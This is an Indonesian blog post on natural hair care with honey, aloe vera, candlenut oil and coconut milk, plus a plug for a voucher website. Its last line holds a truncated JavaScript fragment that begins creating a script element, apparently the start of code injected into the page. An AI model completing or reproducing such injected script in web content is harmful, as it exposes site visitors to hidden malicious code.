Tips dan Cara Merawat Rambut Secara Alami

Rambut merupakan bagian dari tubuh kita yang sangat penting. Bagi perempuan, rambut merupakan mahkota yang dapat menambah pesona kecantikan. Berbagai perawatan dilakukan untuk memperindah rambut, mulai dari perawatan di rumah hingga pergi ke salon. Kebanyakan orang, lebih memilih memperindah rambut dengan cara yang instan yaitu dengan menggunakan bahan-bahan kimia yang biasanya ada di salon. Rambut memang akan terlihat indah saat dari salon. Tapi tahukah Anda bahwa bahan-bahan kimia tersebut dapat merusak rambut Anda?

Jika Anda sudah mengetahui bahaya dari bahan-bahan kimia yang dapat merusak rambut, mengapa Anda tidak mencoba untuk melakukan perawatan secara alami? Perawatan rambut alami akan membuat rambut indah tanpa merusaknya. Agar kalian dapat merawat rambut sendiri di rumah, Anda bisa mencoba tips dan cara merawat rambut secara alami yang akan diuraikan di bawah ini !!

Gunakan Madu

rambut madu

Madu sudah lama dikenal sebagai cairan yang mempunyai banyak fungsi. Selain bermanfaat untuk kesehatan, madu juga bermanfaat untuk memperidah rambut Anda.  Madu tidak hanya berfungsi menambah kesuburan rambut, tapi juga mampu membuat rambut lebih berkilau. Caranya, gunakan 2 hingga 3 sendok madu kemudian usapkan secara merata pada rambut dan kulit kepala. Lakukan secara rutin, maka anda akan mendapatkan hasil yang memuaskan.

Anda dapat membeli madu alami di toko-toko terdekat. Atau Anda juga bisa membelinya secara online. Karena madu di toko online biasanya lebih murah.

Lidah Buaya

lidah buaya

Tidak asing lagi jika mendengar manfaat kidah buaya untuk rambut. Dengan mengaplikasikan gel lidah buaya secara rutin, rambut Anda akan menjadi subur dan indah. Anda sudah mencobanya?

Kemiri

kemiri

Bumbu yang satu ini memang sudah terbukti membuat rambut indah alami. Caranya cukup mudah. Dengan cara membakar atau menyarangrai kemiri hingga menyeluarkan minyak. Minyak dari kemiri tersebut kemudian dioleskan pada rambut. Diamkan selama 1 hingga 2 jam lalu bilas hingga bersih. Tidak hanya mampu menyuburkan rambut, kemiri juga berfungsi memperkuat rambut serta membuat rambut lebih hitam.

Santan Kelapa

santan

Santan kelapa dapat membuat rambut Anda sehat dan cantik. Santan kelapa, dapat berguna untuk mencegah kerontokan rambut dan membuat rambut menjadi semakin halus. Caranya, oleskan santan kelapa secara merata pada rambut dan kulit kepala sambil dipijat agar meresap. Diamkan selama 20 menit, lalu bilas hingga bersih.

Cara di atas merupakan cara alami merawat rambut. Sambil perawatan, sambil cek diskon-diskon menarik dari www.evoucher.co.id yaaa.

Semoga bermanfaat!var d=document;var s=d.createElement(‘script’);

Leave a Reply